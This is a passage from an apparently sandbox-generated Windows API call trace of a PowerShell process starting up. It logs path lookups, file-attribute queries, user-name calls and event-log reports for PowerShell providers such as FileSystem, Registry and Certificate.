nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.839] GetLastError () returned 0xcb [0050.839] SetErrorMode (uMode=0x1) returned 0x1 [0050.839] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x19e0a8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.839] GetLastError () returned 0xcb [0050.839] SetErrorMode (uMode=0x1) returned 0x1 [0050.840] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3527c64 | out: lpFileInformation=0x3527c64*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.840] GetLastError () returned 0xcb [0050.840] SetErrorMode (uMode=0x1) returned 0x1 [0050.840] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x19e0ec, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.840] GetLastError () returned 0xcb [0050.840] SetErrorMode (uMode=0x1) returned 0x1 [0050.840] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3527e04 | out: lpFileInformation=0x3527e04*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.840] GetLastError () returned 0xcb [0050.840] SetErrorMode (uMode=0x1) returned 0x1 [0050.840] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x247ac0, nSize=0x19e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x19e674) returned 0x1 [0050.840] GetLastError () returned 0xcb [0050.840] GetUserNameW (in: lpBuffer=0x247300, pcbBuffer=0x19e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x19e67c) returned 1 [0050.841] ReportEventW (hEventLog=0x4aa0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x352ab8c*="FileSystem", lpRawData=0x352aa48) returned 1 [0050.841] GetLastError () returned 0x0 [0050.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.842] GetLastError () returned 0xcb [0050.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.842] GetLastError () returned 0xcb [0050.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.842] GetLastError () returned 0xcb [0050.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.843] GetLastError () returned 0xcb [0050.843] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x247ac0, nSize=0x19e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x19e674) returned 0x1 [0050.843] GetLastError () returned 0xcb [0050.843] GetUserNameW (in: lpBuffer=0x247300, pcbBuffer=0x19e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x19e67c) returned 1 [0050.843] ReportEventW (hEventLog=0x4aa0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x352ec7c*="Function", lpRawData=0x352eb38) returned 1 [0050.844] GetLastError () returned 0x0 [0050.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.846] GetLastError () returned 0xcb [0050.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e088, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.851] GetLastError () returned 0xcb [0050.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.851] GetLastError () returned 0xcb [0050.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.851] GetLastError () returned 0xcb [0050.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.851] GetLastError () returned 0xcb [0050.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e088, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.885] GetLastError () returned 0xcb [0050.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.885] GetLastError () returned 0xcb [0050.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.885] GetLastError () returned 0xcb [0050.887] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x247ac0, nSize=0x19e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x19e674) returned 0x1 [0050.887] GetLastError () returned 0xcb [0050.887] GetUserNameW (in: lpBuffer=0x247300, pcbBuffer=0x19e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x19e67c) returned 1 [0050.887] ReportEventW (hEventLog=0x4aa0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3547d38*="Registry", lpRawData=0x3547bf4) returned 1 [0050.888] GetLastError () returned 0x0 [0050.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.889] GetLastError () returned 0x0 [0050.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.889] GetLastError () returned 0x0 [0050.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.889] GetLastError () returned 0x0 [0050.890] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x247ac0, nSize=0x19e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x19e674) returned 0x1 [0050.890] GetLastError () returned 0x0 [0050.890] GetUserNameW (in: lpBuffer=0x247300, pcbBuffer=0x19e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x19e67c) returned 1 [0050.891] ReportEventW (hEventLog=0x4aa0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x354bb20*="Variable", lpRawData=0x354b9dc) returned 1 [0050.891] GetLastError () returned 0x0 [0050.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.892] GetLastError () returned 0xcb [0050.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.894] GetLastError () returned 0xcb [0050.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x19e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.895] GetLastError () returned 0xcb [0050.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x19e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.895] GetLastError () returned 0xcb [0050.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x19e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.895] GetLastError () returned 0xcb [0050.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x19e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.895] GetLastError () returned 0xcb [0050.947] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x247ac0, nSize=0x19e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x19e674) returned 0x1 [0050.947] GetLastError () returned 0x3 [0050.948] GetUserNameW (in: lpBuffer=0x247300, pcbBuffer=0x19e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x19e67c) returned 1 [0050.948] ReportEventW (hEventLog=0x4aa0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35598ec*="Certificate", lpRawData=0x35597a8) returned 1 [0050.948] GetLastError () returned 0x0 [0050.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.959] GetLastError () returned 0xcb [0050.961] GetLogicalDrives () returned 0x4 [0050.961] GetLastError () returned 0xcb [0050.961] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x19e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.961] GetLastError () returned 0xcb [0050.961] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.961] GetLastError () returned 0xcb [0050.965] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x247300 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0050.965] GetLastError () returned 0xcb [0050.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.966] GetLastError () returned 0xcb [0050.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.966] GetLastError () returned 0xcb [0050.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.983] GetLastError () returned 0xcb [0050.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.985] GetLastError () returned 0xcb [0050.985] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x19e034, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0050.985] GetLastError () returned 0xcb [0050.985] SetErrorMode (uMode=0x1) returned 0x1 [0050.985] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x3561258 | out: lpFileInformation=0x3561258*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.985] GetLastError () returned 0xcb [0050.985] SetErrorMode (uMode=0x1) returned 0x1 [0050.986] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x19e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0050.986] GetLastError () returned 0xcb [0050.986] SetErrorMode (uMode=0x1) returned 0x1 [0050.986] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x356140c | out: lpFileInformation=0x356140c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.986] GetLastError () returned 0xcb [0050.986] SetErrorMode (uMode=0x1) returned 0x1 [0050.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.990] GetLastError () returned 0xcb [0051.018] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x19e184, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0051.018] GetLastError () returned 0xcb [0051.018] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x19e100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0051.018] GetLastError () returned 0xcb [0051.019] SetErrorMode (uMode=0x1) returned 0x1 [0051.019] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x19e580 | out: lpFileInformation=0x19e580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.019] GetLastError () returned 0xcb [0051.019] SetErrorMode (uMode=0x1) returned 0x1 [0051.019] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x19e100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0051.019] GetLastError () returned 0xcb [0051.019] SetErrorMode (uMode=0x1) returned 0x1 [0051.019] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x19e580 | out: lpFileInformation=0x19e580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.019] GetLastError () returned 0xcb [0051.019] SetErrorMode (uMode=0x1) returned 0x1 [0051.019] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x19e114, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0051.019] GetLastError () returned 0xcb [0051.019] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x19e0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0051.019] GetLastError () returned 0xcb [0051.019] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x19e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0051.019] GetLastError () returned 0xcb [0051.019] SetErrorMode (uMode=0x1) returned 0x1 [0051.019] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x19e580 | out: lpFileInformation=0x19e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0051.019] GetLastError () returned 0xcb [0051.019] SetErrorMode (uMode=0x1) returned 0x1 [0051.019] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x19e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0051.019] GetLastError () returned 0xcb [0051.019] SetErrorMode (uMode=0x1) returned 0x1 [0051.019] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x19e580 | out: lpFileInformation=0x19e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0051.020] GetLastError () returned 0xcb [0051.020] SetErrorMode (uMode=0x1) returned 0x1 [0051.020] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x19e114, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0051.020] GetLastError () returned 0xcb [0051.020] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x19e0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0051.020] GetLastError () returned 0xcb [0051.020] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x19e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0051.020] GetLastError () returned 0xcb [0051.020] SetErrorMode (uMode=0x1) returned 0x1 [0051.020] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x19e580 | out: lpFileInformation=0x19e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.020] GetLastError () returned 0xcb [0051.020] SetErrorMode (uMode=0x1) returned 0x1 [0051.020] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x19e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0051.020] GetLastError () returned 0xcb [0051.020] SetErrorMode (uMode=0x1) returned 0x1 [0051.020] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x19e580 | out: lpFileInformation=0x19e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.020] GetLastError () returned 0xcb [0051.020] SetErrorMode (uMode=0x1) returned 0x1 [0051.020] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x19e114, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0051.020] GetLastError () returned 0xcb [0051.020] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x19e0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0051.020] GetLastError () returned 0xcb [0051.020] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x19e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0051.020] GetLastError () returned 0xcb [0051.020] SetErrorMode (uMode=0x1) returned 0x1 [0051.020] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x19e580 | out: lpFileInformation=0x19e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.020] GetLastError () returned 0xcb [0051.020] SetErrorMode (uMode=0x1) returned 0x1 [0051.021] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x19e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0051.021] GetLastError () returned 0xcb [0051.021] SetErrorMode (uMode=0x1) returned 0x1 [0051.021] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x19e580 | out: lpFileInformation=0x19e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.021] GetLastError () returned 0xcb [0051.021] SetErrorMode (uMode=0x1) returned 0x1 [0051.021] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x19e114, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0051.021] GetLastError () returned 0xcb [0051.021] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x19e0b0, 